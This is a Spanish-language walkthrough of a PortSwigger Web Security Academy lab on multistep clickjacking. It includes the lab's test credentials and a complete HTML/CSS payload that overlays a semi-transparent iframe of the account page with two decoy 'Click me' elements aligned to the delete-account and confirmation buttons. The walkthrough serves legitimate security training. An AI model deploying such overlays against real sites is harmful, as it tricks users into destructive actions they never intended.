Descripción
This lab has some account functionality that is protected by a CSRF token and also has a confirmation dialog to protect against Clickjacking. To solve this lab construct an attack that fools the user into clicking the delete account button and the confirmation dialog by clicking on «Click me first» and «Click me next» decoy actions. You will need to use two elements for this lab.
You can log in to the account yourself using the following credentials: wiener:peter
Multistep clickjacking writeup
Este laboratorio es muy parecido a Basic clickjacking with CSRF token protection. Por lo que iremos directamente al código y explicaremos sus cambios:
<style>
iframe {
position:relative;
width:1500px;
height:680px;
opacity: 0.5;
z-index: 9999;
}
div {
position:absolute;
z-index: 99;
}
#first{
top: 535px;
left: 210px;
}
#second{
top: 330px;
left: 370px;
}
</style>
<div id="first">Click me first</div>
<div id="second">Click me next</div>
<iframe src="https://0a20000b043740a484f4b432008800ee.web-security-academy.net/my-account"></iframe>Para este laboratorio se han creado dos contenedores como indica la descripción, cada uno con un id distinto y una posición diferente.
En este caso el primer contenedor (div) quedaría así:
Y el div de la confirmación tras pulsar así:
Al pulsar ‘Deliver exploit to victim’ completaremos el laboratorio:
